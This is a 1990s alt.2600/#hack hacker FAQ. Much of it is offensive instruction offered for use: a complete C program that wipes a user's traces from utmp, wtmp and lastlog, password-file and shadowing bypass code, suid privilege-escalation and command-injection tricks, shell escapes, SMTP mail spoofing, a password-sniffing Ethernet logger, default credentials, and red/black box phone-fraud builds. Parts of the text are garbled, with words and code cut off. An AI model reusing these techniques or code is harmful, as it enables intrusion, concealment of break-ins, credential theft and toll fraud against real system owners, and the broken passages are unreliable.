Editors Note: Welcome to Beta .007, licensed to amuse. This release of the #hack FAQ is now the alt.2600/#hack FAQ. XXXXXXXX* , editor of the alt.2600 FAQ, and I have merged our two FAQ's into one. Eleet greets go out to XXXX* , better known as Tomes. This release is dedicated to Eric S. Real <esr@locke.ccil.org> for not only emailing me the first real flame for the FAQ, but also including a huge advertisement for a book he is hawking. To quote our little buddy Eric "I will denounce you and your cracker pals as the pathetic scum you are. *And* do my best to see that as many as possible of you end up in Leavenworth getting butt-fucked by reality." Eric, this Bud's for you. Many sections are missing or incomplete. The #hack FAQ comes with no warranties, express or implied. If you have a questions regarding any of the topics covered in the FAQ, please direct it to alt.2600 or #hack. Please do not e-mail me with them, I'm getting swamped. If your copy of the #hack FAQ does not end with the letters EOT on a line by themselves, you do not have the entire FAQ. I promise to spell check this beast before I release version 1.0.
** BETA ** Beta Revision .007 alt.2600/#Hack F.A.Q. by Voyager will@gnu.ai.mit.edu Sysop of Hacker's Haven (303) 343-4053 With special thanks to: A-Flat, Al, Aleph1, Bluesmn, C-Curve, Edison, KCrow, Major, Presence, Rogue Agent, sbin, Tomes and TheSaint. We work in the dark We do what we can We give what we have Our doubt is our passion, and our passion is our task The rest is the madness of art. -- Henry James
01. How do I access the password file under Unix?
In standard Unix the password file is /etc/passwd. On a Unix system with either NIS/yp or password shadowing, much of the password data may be elsewhere.
02. How do I crack Unix passwords?
Contrary to popular belief, Unix passwords cannot be decrypted. Unix passwords are encrypted with a one way function. The login program encrypts the text you enter at the "password:" prompt and compares that encrypted string against the encrypted form of your password.
Password cracking software uses wordlists. Each word in the wordlist is encrypted with each of the 4096 possible salt values and the results are compared to the encrypted form of the target password.
The best cracking program for Unix passwords is currently Crack by Alec Muffett. For PC-DOS, the best package to use is currently CrackerJack.
03. How do I access the password file under VMS?
Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However, unlike Unix, most users do not have access to read the password file.
04. How do I crack VMS passwords?
Write a program that uses the SYS$GETUAF functions to compare the results of encrypted words against the encrypted data in SYSUAF.DAT.
Two such programs are known to exist, CHECK_PASSWORD and GUESS_PASSWORD.
NIS (Network Information System) in the current name for what was once known as yp (Yellow Pages). The purpose for NIS is to allow many machies on a network to share configuration information, including password data. NIS is not designed to promote system security. If your system uses NIS you will have a very short /etc/passwd file with a line that looks like this:
+::0:0:::
To view the real password file use this command "ypcat passwd"
06. What is password shadowing?
Password shadowing is a security system where the encrypted password field of /etc/password is replaced with a special token and the encrypted password is stored in a seperate file which is not readable by normal system users.
To defeat password shadowing on many (but not all) systems, write a program that uses successive calls to getpwent() to obtain the password file.
Example:
#include <pwd.h> main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); }
07. How do I break out of a restricted shell?
On poorly implemented restricted shells you can break out of the restricted environment by running a program that features a shell function. A good example is vi. Run vi and use this command:
:set shell=/bin/sh
then shell using this command:
:shell
08. How do I gain root from a suid script or program?
1. Change IFS.
If the program calls any other programs using the system() function call, you may be able to fool it by changing IFS. IFS is the Internal Field Seperator that the shell uses to delimit arguments.
If the program contains a line that looks like this:
system("/bin/date")
and you change IFS to '/' the shell will them interpret the proceeding line as:
bin date
Now, if you have a program of your own in the path called "bin" the suid program will run your program instead of /bin/date.
To change IFS, use this command:
set IFS '/'
2. link the script to -i
Create a symbolic link named "-i" to the program. Running "-i" will cause the interpreter shell (/bin/sh) to start up in interactive mode. This only works on suid shell scripts.
Example:
% ln suid.sh -i % -i #
3. Exploit a race condition
Replace a symbolic link to the program with another program while the kernel is loading /bin/sh.
Example:
nice -19 suidprog ; ln -s evilprog suidroot
4. Send bad input the the program.
Invoke the name of the program and a seperate command on the same command line.
Example:
suidprog ; id
09. How do I erase my presence from the system logs?
Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.
Example:
#include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <sys/file.h> #include <fcntl.h> #include <utmp.h> #include <pwd.h> #include <lastlog.h> #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); }
Telnet to port 25 of the machine you want the mail to appear to originate from. Enter your message as in this example:
HELO bellcore.com MAIL FROM:Voyagor@bellcore.com RCPT TO:clinton@whitehouse.gov DATA Please discontinue your silly Clipper initiative. . QUIT
On systems that have RFC 931 implemented, spoofing your "MAIL FROM:" line will not work. Test by sending yourself fakemail first.
11. How do I fake posts to UseNet?
Use inews to post. Give inews the following lines:
From: Newsgroups: Subject: Message-ID: Date: Organization:For a moderated newsgroup, inews will also require this line:
Approved:
Then add your post and terminate with
Example:
12. How do I hack ChanOp on IRC?
Find a server that is split from the rest of IRC and create your own
channel there using the name of the channel you want ChanOp on. When
that server reconnects to the net, you will have ChanOp on the real
channel. If you have ServerOp on a server, you can cause it to split
on purpose.
13. How do I modify the IRC client to hide my real username?
Get the IRC client from cs.bu.edu /irc/clients. Look at the source
code files irc.c and ctcp.c. The code you are looking for is fairly
easy to spot. Change it. Change the username code in irc.c and the
ctcp information code in ctcp.c. Compile and run your client.
14. What is a trojan/worm/virus/logic bomb?
Trojan: An independent program that appears to perform a useful
function but that hides another unauthorized program
inside it. When an authorized user performs the apparrent
function, the trojan horse performs the unauthorized
function as well (often usurping the priveleges of the
user).
Virus: A code fragment (not an independent program) that
reproduces by attaching to another program. It may damage
data directly, or it may degrade system performance by
taking over system resources which are then not available
to authorized users.
Worm: An independent program that reproduces by copying itself
from one system to another, usually over a network. Like
a virus, a worm may damage data directly, or it may
degrade system performace by tying up system resources and
even shutting down a network.
Logic Bomb: A method for releasing a system attack of some kind. It
is triggered when a particular condition (e.g., a certain
date or system operation) occurs.
15. How can I protect myself from virii and such?
Always write protect your floppy disks when you are not purposefully
writing to them.
Use ATTRIB to make all of your EXE and COM files read only. This will
protect you from many poorly written viruses.
Scan any software that you receive with a recent copy of a good virus
scanner. The best virus scanner currently available for DOS is F-Prot
by Fridrik Skulason. The current version is FP-212C. It is best to
use more than one virus scanner. That will decrease your chances of
missing a virus.
Backup regularly, and keep several generations of backups on hand.
If you always backup over your last backup, you may find yourself with
an infected backup tape.
This FAQ answer is excerpted from:
A message is called either plaintext or cleartext. The process of
disguising a message in such a way as to hide its substance is called
encryption. An encrypted message is called ciphertext. The process
of turning ciphertext back into plaintext is called decryption.
The art and science of keeping messages secure is called cryptography,
and it is practiced by cryptographers. Cryptanalysts are
practitioners of cryptanalysis, the art and science of breaking
ciphertext, i.e. seeing through the disguise. The branch of
mathematics embodying both cryptography and cryptanalysis is called
cryptology, and it's practitioners are called cryptologists.
This FAQ answer is excerpted from:
PGP(tm) uses public-key encryption to protect E-mail and data files.
Communicate securely with people you've never met, with no secure
channels needed for prior exchange of keys. PGP is well featured and
fast, with sophisticated key management, digital signatures, data
compression, and good ergonomic design.
Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
high security cryptographic software application for MSDOS, Unix,
VAX/VMS, and other computers. PGP allows people to exchange files or
messages with privacy, authentication, and convenience. Privacy means
that only those intended to receive a message can read it.
Authentication means that messages that appear to be from a particular
person can only have originated from that person. Convenience means
that privacy and authentication are provided without the hassles of
managing keys associated with conventional cryptographic software. No
secure channels are needed to exchange keys between users, which makes
PGP much easier to use. This is because PGP is based on a powerful
new technology called "public key" cryptography.
PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
public key cryptosystem with the speed of conventional cryptography,
message digests for digital signatures, data compression before
encryption, good ergonomic design, and sophisticated key management.
And PGP performs the public-key functions faster than most other
software implementations. PGP is public key cryptography for the
masses.
Computers and other electonic equipment release interference to their
surrounding environment. You may observe this by placing two video
monitors close together. The pictures will behave erratically until
you space them apart.
Although most of the time these emissions are simply annoyances, they
can sometimes be very helpful. Suppose we wanted to see what project
a target was working on. We could sit in a van outside her office and
use sensitive electonic equipment to attempt to pick up and decipher
the emanations from her video monitor.
Our competetor, however, could shield the emanations from her
equipment or use equipment without strong emanations.
Tempest is the US Government program for evaluation and endorsement
of electronic equipment that is safe from eavesdropping.
19. How to I change to directories with strange characters in
them?
These directories are often used by people trying to hide information,
most often warez (commercial software).
There are several things you can do to determine what these strange
characters are. One is to use the arguments to the ls command that
cause ls to give you more information:
From the man page for ls:
Perhaps the most useful tool is to simply do an "ls -al filename" to
save the directory of the remote ftp site as a file on your local
machine. Then you can do a "cat -t -v -e filename" too see exactly
what those bizarre little characters are.
From the man page for cat:
If the directory name includes a <SPACE> or a <TAB> you will need to
enclose the entire directory name in quotes. Example:
On an IBM-PC, you may enter these special characters by holding down
the <ALT> key and entering the decimal value of the special character
on your numeric keypad. When you release the <ALT> key, the special
character should appear on your screen. An ASCII chart can be very
helpful.
If the directory name includes a <SPACE> or a <TAB> you will need
to enclose the entire directory name in quotes. Example:
cd "..<TAB>"
20. What is ethernet sniffing?
Ethernet sniffing is listening (with software) to the raw ethernet
device for packets that interest you. When your software sees a
packet that fits certain criteria, it logs it to a file. The most
common criteria for an interesting packet is one that contains words
like "login" or "password."
Many enternet sniffers are available, here are a few that may be on
your system now:
Here is source code for an ethernet sniffer:
21. What is an Internet Outdial?
An Internet outdial is a modem connected to the Inyou can
use to dial out. Normal outdials will only call local numbers. A GOD
(Global OutDial) is capable of calling long distance. Outdials are an
inexpensive method of calling long distance BBS's.
22. What are some Internet Outdials?
This FAQ answer is excerpted from: BlackAdders FTP/FSP Site List.
23. What is an anonymous remailer?
An anonymous remailer is a system on the Internet that allows you to
send e-mail anonymously or post messages to Usenet anonymously.
You apply for an anonymous ID at the remailer site. Then, when you
send a message to the remailer, it sends it out from your anonymous ID
at the remailer. No one reading the post will know your real account
name or host name. If someone sends a message to your anonymous ID,
it will be forwarded to your real account by the remailer.
24. What are the addresses of some anonymous
remailers?
The most poular and stable anonymous remailer is anon.penet.fi,
operated by Johan Helsingus. To obtain an anonymous ID, mail
ping@anon.penet.fi. For assistance is obtaining an anonymous account
at penet, mail help@anon.penet.fi.
25. How do I defeat copy protection?
There are two common methods of defeating copy protection. The first
is to use a program that removes copy protection. Popular programs
that do this are CopyIIPC from Central Point Software and CopyWrite
from Quaid Software. The second method involves patching the copy
protected program. For popular software, you may be able to locate a
ready made patch. You can them apply the patch using any hex editor,
such as debug or the Peter Norton's DiskEdit. If you cannot, you must
patch the software yourself.
Writing a patch requires a debugger, such as Soft-Ice or Sourcer. It
also requires some knowledge of assembly language. Load the protected
program under the debugger and watch for it to check the protection
mechanism. When it does, change that portion of the code. The code
can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to
JMP (Jump Unconditionally). Or the code may simply be replaced with
NOP (No Operation) instructions.
AS/400
> UserID?
CDC Cyber
> WELCOME TO THE NOS SOFTWARE SYSTEM.
Hewlett Packard MPE-XL
> MPE XL:
GTN
> WELCOME TO CITIBANK. PLEASE SIGN ON.
PRIMOS
> PRIMENET 19.2.7F PPOA1
>
Hewlett Packard MPE-XL
Tops-10
> NIH Timesharing
VM/370
> VM/370
27. What are the default accounts for XXX?
AS/400
> qsecofr/qsecofr (master security officer)
Hewlett Packard MPE-XL
System 75
Verifone Junior 2.05
> Defaul 166816
The file /etc/services on most Unix machines lists the activity
occuring on each port. Here is a sample /etc/services file from
Linux:
When a coin is inserted into a payphone, the phone emits a set of
tones. A red box is a device that simulates those tones, with the
purpose of fooling the payphone into believing you have inserted an
actual coin. The actual tones are:
Nickel Signal - 1700+2200 0.06
Dime Signal - 1700+2200 0.060s on, 0.060s off, twice repeating
Red boxes are commonly manufactured from modified Radio Shack tone
dialers, Hallmark greeting cards, or made from scratch from readily
available electronic components.
To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer,
open the dialer and replace the crystal (the largesttal
component). The exact value needed is 6.502457409Mhz. Unfortunately,
that crystal is not commonly manufactured. A crystal close to that
value will create a tone that falls within tolerances. The most
popular choice is the 6.5536Mhz crystal. When you are finished
replacing the crystal, program the P1 button with five *'s. That will
simulate a quarter tone each time you press P1.
03. Where can I get a 6.5536Mhz crystal?
Your best bet is a local electronics store Radio Shack sells them,
but they are overpriced and the store must order them in. This takes
approximately two weeks. In addition, many Radio Shack employees do
not know that this can be done.
Or, you could order the crystal mail order. This introduces Shipping
and Handling charges, which are usually much greater than the price of
the crystal. It's best to get several people together to share the
S&H cost. Or, buy five or six yourself and sell them later. Some of
the places you can order crystals are:
JDR Microdevices:
Red Boxes will work on TelCo owned payphones, but not on COCOT's
(Customer Owned Coin Operated Telephones).
Blue boxes use a 2600hz tone to convince telephone switches that use
in-band signalling that the caller is actually a telephone operator.
The caller may then access special switch functions, with the usual
purpose of making free long distance phone calls, using the
Multi-Frequency tones provided by the Blue Box.
Blue Boxes still work in areas using in-band signalling. Modern phone
signalling switches using ESS (Electronic Signalling Systems) use
out-of-band-signalling. Nothing you send over the voice portion of
bandwidth can control the switch.
e="blackbox">07. What is a Black Box?
A Black Box is a 10k ohm resistor placed across your phone line to
cause the phone company equipment to be unable to detect that you have
answered your telephone. People who call you will then not be billed
for the telephone call.
08. What do all the colored boxes do?
How to find your ANAC number:
Look up your NPA (Area Code) and try the number listed for it. If that
fails, try 1 plus the number listed for it. If that fails, try the
common numbers like 311, 958 and 200-222-2222. If that fails, try the
nationwide ANAC number 404-988-9664. If you find the ANAC number for
your area, please let us know.
Note that many times the ANAC number will vary for different
switches in the same city.
A trick to getting the number of the phone line you are calling from
is to call an (800) phone sex line. Example: (800)571-8859. These
systems will give you an account number, which in many cases includes
the telephone number of the phone from which you are calling.
Another useful 800 ANAC number is the Duke Power Company Automated
Outage System at (800)769-3766. The system will read back to you
the phone number from which you are calling.
Even another 800 ANAC number is Info Access Telephone Company's
Automated Blocking line at (800)568-3197. It will read back to
you the number from which you are calling, and ask if you would like
it blocked.
(803282-630 is another sex line that will give you (after a bit of
work) the last four digits of the phone number you are calling from.
An non-800 ANAC that works nationwide is (404) 988-9664.
Please use local ANAC numbers if you can, as abuse or overuse kills
800 ANAC numbers.
This FAQ answer is excerpted from:
CNA stands for Customer Name and Address. The CNA number is a phone
number for telephone company personnel to call and get the name and
address for a phone number.If a telephone lineman finds a phone line
he does not recognize, he can use the ANI number to find it's phone
number and then call the CNA operator to see who owns it and where
they live.
Normal CNA numbers are available only to telephone company personnel.
Private citizens may now legally get CNA information from private
companies. Two such companies are:
15. What is the telephone company CNA number for my
area?
Scanning is dialing a large number of telephone numbers in the hope
of finding interesting carriers (computers) or tones.
Scanning can be done by hand, although dialing several ousand
telephone numbers by hand is extremely boring and takes a long time.
Much better is to use a scanning program, sometimes called a war
dialer or a demon dialer. Currently, the best war dialer available
to PC-DOS users is ToneLoc .99b8.
A war dialer will dial a range of numbers and log what it finds at
each number. You can then only dial up the numbers that the war
dialer marked as carriers or tones.
Excerpt from: 2600, Spring 1990, Page 27:
In some places, scanning has been made illegal. It would be hard,
though, for someone to file a complaint against you for scanning since
the whole purpose is to call every number once and only once. It's
not likely to be thought of as harassment by anyone who gets a single
phone call from a scanning computer. Some central offices have been
known to react strangely when people start scanning. Sometimes you're
unable to get a dialtone for hours after you start scanning. But
there is no uniform policy. The best thing to do is to first find out
if you've got some crazy law saying you can't do it. If, as is
likely, there is no such law, the only way to find out what happens is
to give it a try.
---
It should be noted that a law making scanning illegal was recently
passed i Colorado Springs, CO. It is now illegal to place a call
in Colorado Springs without the intent to communicate.
18. Where can I purchase a lineman's handset?
Time Motion Tools
Contact East
19. What are the DTMF frequencies?
DTMF stands for Dual Tone Multi Frequency. These are the tones you
get when you press a key on your telephone touchpad. The tone of the
button is the sum of the column and row tones. The ABCD keys do not
exist on standard telephones.
01. What are some ftp sites of interest to hackers?
Here is the list agtime in .netrc format:
02. What are some newsgroups of interest to
hackers?
http://dfw.net/~aleph1
http://first.org
http://l0pht.com
gopher.cpsr.org
gopher.eff.org
wiretap.spies.com05. What are some World Wide Web (WWW) sites of interest to
hackers?
08. What books are available on this subject?
General Computer Security
Unix System Security
Network Security
Programmed Threats
Hacking History and Culture
Unclassified
Wired
Subscription Address: subscriptions@wired.com
or
Wired
Letters and article submission address: guideleines@wired.com
or
Wired
Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)
11. What are some organizations of interest to
hackers?
Computer Professionals for Social lity (CPSR)
CPSR empowers computer professionals and computer users to advocate
for the responsible use of information technology and empowers all who
use computer technology to participate in the public debate. As
technical experts, CPSR members provide the public and policymakers
with realistic assessments of the power, promise, and limitations of
computer technology. As an organization of concerned citizens, CPSR
directs public attention to critical choices concerning the
applications of computing and how those choices affect society.
By matching unimpeachable technical information with policy
development savvy, CPSR uses minimum dollars to have maximum impact
and encourages broad publicrticipation in
200 Supporting member
500 Sponsoring member
1000 Lifetime member
20 Student/low income member
50 Foreign subscriber
50 Library/institutional subscriber
CPSR National Office
CPSR National Office
The League for Programming Freedom (LPF)
The League for Programming Freedom is an organization of people who
oppose the attempt to monopolize common user interfaces through "look
and feel" copyright lawsuits. Some of us are programmers, who worry
that such monopolies will obstruct our work. Some of us are users,
who want new computer systems to be compatible with the interfaces we
know. Some are founders of hardware or software companies, such as
Richard P. Gabriel. Some of us are professors or researchers,
including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S.
Boyer and Patrick Winston.
"Look and feel" lawsuits aim to create a new class of government-
enforced monopolies broader in scope than ever before. Such a system
of user-interface copyright would impose gratuitous incompatibility,
reduce competition, and stifle innovation.
We in the League hope to prevent these problems by preventing
user-interface copyright. The League is NOT opposed to copyrigwas understood until 1986 -- copyright on particular programs.
Our aim is to stop changes in the copyright system which would take
away programmers' traditional freedom to write new programs compatible
with existing programs and practices.
Annual dues for individual members are $42 for employed professionals,
$10.50 for students, and $21 for others. We appreciate activists, but
members who cannot contribute their time are also welcome.
To contact the League, phone (617) 243-4091, send Internet mail to the
address league@prep.ai.mit.edu, or write to:
League for Programming Freedom
Founded in 1989, SotMesc is dedicated to preserving the integrity and
cohesion of the computing society. By promoting computer education,
liberties and efficiency, we believe we can secure freedoms for all
computer users while retaining privacy.
SotMesc maintains the CSP Internet mailing list, the SotMesc
Scholarship Fund, and the SotMesc Newsletter.
The SotMESC is financed partly by membership fees, and donations, but
mostly by selling ng, cracking, phreaking, electronics, internet,
and virus information and programs on disk and bound paper media.
SotMesc memberships are $20 to students and $40 to regular members.
SotMESC
Alt.2600 is a Usenet newsgroup for discussion of material relating to
2600 Magazine, the hacker quarterly. It is NOT for the Atari 2600
game machine. Len@netsys.comted the group on Emmanual
Goldstein's recommendation. Emmanuel is the editor/publisher of 2600
Magazine. Following the barrage of postings about the Atari machine to
alt.2600, an alt.atari.2600 was created to divert all of the atari
traffic from alt.2600. Atari 2600 people are advised to hie over to
rec.games.video.classic.
2600Hz was a tone that was used by early phone phreaks (or
phreakers) in the 80's, and some currently. If the tone was sent down the
line at the proper time, one could get away with all sorts of fun stuff.
A note from Emmanuel Goldstein:
03. Are there on-line versions of 2600
available?
No.
04. I can't find 2600 at any bookstores. What can I
do?
Subscribe. Or, let 2600 know via the subscription address that you
think 2600 should be in the bookstore. Be sure to include the
bookstores name and address.
05. Why does 2600 cost more to subscribe to than to buy
at a newsstand?
A note from Emmanuel Goldstein:
Credit cards us the Luhn Check Digit Algorithm. The main purpose of
this algorithm is to catch data entry errors, but it does double duty
here as a weak security tool.
For a card with an even number of digits, double every odd digit and
subtract 9 if the product is greater than 10. Add up all the even
digits as well as the doubled-odd digits, and the result must be a
multiple of 10 or it's not a valid card. If the card has an odd
number of digits, perform the same addition doubling the even digits
instead.
03. Where can I get a copy of the #hack FAQ?
Find it on FTP at:
Find it on World Wide Web at:
Find it with Finger at:
Click your heels twice and you will be home...
From: Dale Drew
Newsgroups: alt.2600
Subject: Please forgive me
Message-ID:
Computer Security Basics
by Deborah Russell
and G.T. Gengemi Sr.
PGP(tm) User's Guide
Volume I: Essential Topics
by Philip Zimmermann
-F Causes directories to be marked with a trailing ``/'',
executable files to be marked with a trailing ``*'', and
symbolic links to be marked with a trailing ``@'' symbol.
-q Forces printing of non-graphic characters in filenames as
the character ``?''.
-b Forces printing of non-graphic characters in the \ddd
notation, in octal.
-v Causes non-printing characters (with the exception of tabs,
newlines, and form feeds) to be displayed. Control characters
are displayed as ^X (<Ctrl>x), where X is the key pressed
with the <Ctrl> key (for example, <Ctrl>m is displayed as
^M). The <Del> character (octal 0177) is printed as ^?.
Non-ASCII characters (with the high bit set) are printed as
M -x, where x is the character specified by the seven low
order bits.
-t Causes tabs to be printed as ^I and form feeds as ^L. This
option is ignored if the -v option is not specified.
-e Causes a ``$'' character to be printed at the end of each
line (prior to the new-line). This option is ignored if
the -v option is not set.
cd "..<TAB>"
OS Sniffer
~~ ~~~~~~~
HP/UX nettl (monitor) & netfmt (display)
SunOS etherfind
Solaris snoop
DOS ETHLOAD
LanWatch
The Gobbler
Netmon
LanPatrol
Netwatch
/* Esniff.c */
#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <sys/time.h>
#include <sys/file.h>
#include <sys/stropts.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net/nit_if.h>
#include <net/nit_buf.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/ip_var.h>
#include <netinet/udp_var.h>
#include <netinet/in_systm.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <arpa/inet.h>
#define ERR stderr
char *malloc();
char *device,
*ProgName,
*LogName;
FILE *LOG;
int debug=0;
#define NIT_DEV "/dev/nit"
#define CHUNKSIZE 4096 /* device buffer size */
int if_fd = -1;
int Packet[CHUNKSIZE+32];
void Pexit(err,msg)
int err; char *msg;
{ perror(msg);
exit(err); }
void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg);
exit(err); }
#define IP ((struct ip *)Packet)
#define IP_OFFSET (0x1FFF)
#define SZETH (sizeof(struct ether_header))
#define IPLEN (ntohs(ip->ip_len))
#define IPHLEN (ip->ip_hl)
#define TCPOFF (tcph->th_off)
#define IPS (ip->ip_src)
#define IPD (ip->ip_dst)
#define TCPS (tcph->th_sport)
#define TCPD (tcph->th_dport)
#define IPeq(s,t) ((s).s_addr == (t).s_addr)
#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
#define MAXBUFLEN (128)
time_t LastTIME = 0;
struct CREC {
struct CREC *Next,
*Last;
time_t Time; /* start time */
struct in_addr SRCip,
DSTip;
u_int SRCport, /* src/dst ports */
DSTport;
u_char Data[MAXBUFLEN+2]; /* important stuff :-) */
u_int Length; /* current data length */
u_int PKcnt; /* # pkts */
u_long LASTseq;
};
struct CREC *CLroot = NULL;
char *Symaddr(ip)
register struct in_addr ip;
{ register struct hostent *he =
gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
return( (he)?(he->h_name):(inet_ntoa(ip)) );
}
char *TCPflags(flgs)
register u_char flgs;
{ static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
SFL(0,TH_FIN, 'F');
SFL(1,TH_SYN, 'S');
SFL(2,TH_RST, 'R');
SFL(3,TH_PUSH,'P');
SFL(4,TH_ACK, 'A');
SFL(5,TH_URG, 'U');
iobuf[6]=0;
return(iobuf);
}
char *SERVp(port)
register u_int port;
{ static char buf[10];
register char *p;
switch(port) {
case IPPORT_LOGINSERVER: p="rlogin"; break;
case IPPORT_TELNET: p="telnet"; break;
case I p="smtp"; break;
case IPPORT_FTP: p="ftp"; break;
default: sprintf(buf,"%u",port); p=buf; break;
}
return(p);
}
char *Ptm(t)
register time_t *t;
{ register char *p = ctime(t);
p[strlen(p)-6]=0; /* strip " YYYY\n" */
return(p);
}
char *NOWtm()
{ time_t tm;
time(&tm);
return( Ptm(&tm) );
}
#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))
/* add an item */
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
register struct CREC *CLtmp = \
(struct CREC *)malloc(sizeof(struct CREC)); \
time( &(CLtmp->Time) ); \
CLtmp->SRCip.s_addr = SIP.s_addr; \
CLtmp->DSTip.s_addr = DIP.s_addr; \
CLtmp->SRCport = SPORT; \
CLtmp->DSTport = DPORT; \
CLtmp->Length = MIN(LEN,MAXBUFLEN); \
bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
CLtmp->PKcnt = 1; \
CLtmp->Next = CLroot; \
CLtmp->Last = NULL; \
CLroot = CLtmp; \
}
register struct CREC *GET_NODE(Sip,SP,Dip,DP)
register struct in_addrp;
register u_int SP,DP;
{ register struct CREC *CLr = CLroot;
while(CLr != NULL) {
if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
break;
CLr = CLr->Next;
}
return(CLr);
}
#define ADDDATA_NODE(CL,DATA,LEN) { \
bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
CL->Length += LEN; \
}
#define PR_DATA(dp,ln) { \
register u_char lastc=0; \
while(ln-- >0) { \
if(*dp < 32) { \
*dp) { \
case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
break; \
case '\r': \
case '\n': fprintf(LOG,"\n : "); \
break; \
default : fprintf(LOG,"^%c", (*dp + 64)); \
break; \
} \
} else { \
if(isprint(*dp)) fputc(*dp,LOG); \
else fprintf(LOG,"(%d)",*dp); \
} \
lastc = *dp++; \
} \
fflush(LOG); \
}
void END_NODE(CLe,d,dl,msg)
register struct CREC *CLe;
register u_char *d;
register int dl;
register char *msg;
{
fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
fprintf(LOG," DATA: ");
{ register u_int i = CLe->Length;
register u_char *p = CLe->Data;
PR_DATA(p,i);
PR_DATA(d,dl);
}
fprintf(LOG,"\n-- \n");
fflush(LOG);
if(CLe->Next != NULL)
CLe->Next->Last = CLe->Last;
if(CLe->Last != NULL)
CLe->Last->Next = CLe->Next;
else
CLroot = CLe->Next;
free(CLe);
}
/* 30 mins (x 60 seconds) */
#define IDLE_TIMEOUT 1800
#define IDLE_NODE() { \
time_t tm; \
time(&tm); \
if(LastTIME
Area Address(s) Command(s)
------ ------------------------------- ---------------------
201 128.112.88 128.112.88.1
128.112.88.2
128.112.88.3
204 umnet.cc.manitoba.ca "dial12" or "dial24"
206 dialout24.cac.washington.edu
215 wiseowl.ocis.temple.edu atz
atdt 9xxxyyyy
129.72.1.59 hayes compat
218 aa28.d.umn.edu cli
rlogin modem
at "login:" type
"modem"
modem.d.umn.edu "Hayes"
232 isn.rdns.iastate.edu MODEM [Works!!]
atz
atdt8xxx-xxxx
303 129.82.100.64 login: modem [need password!]
307 modem.uwyo.edu
129.72.1.59 hayes compat
313 35.1.1.6 "dial2400-aa" or [can't connect]
"dial1200-aa"
404 emory.edu .modem8 or
.dialout
broadband.cc.emory.edu .modem8 or
.dialout
128.140.1.239 or .modem96|CR
412 gate.cis.pitt.edu LAT
connect dialout
^E
atdt 91k xxx-xxxx
415 128.32.132.250 "dial1" or "dial2"
416 pacx.utcs.utoronto.ca modem
ax-xxxx
annex132.berkely.edu atdt 9,,,,, xxx-xxxx
502 uknet.uky.edu outdial2400
atdt 9xxx-xxxx
514 132.204.2.11 externe#9 9xxx-xxxx
515 isn.rdns.iastate.edu login MODEM
0
128.112.131.111
128.112.131.112
128.112.131.113
129.72.1.59 "Hayes"
128.119.131.110 "Hayes"
128.119.131.111
128.119.131.112
128.119.131.113
128.119.131.114
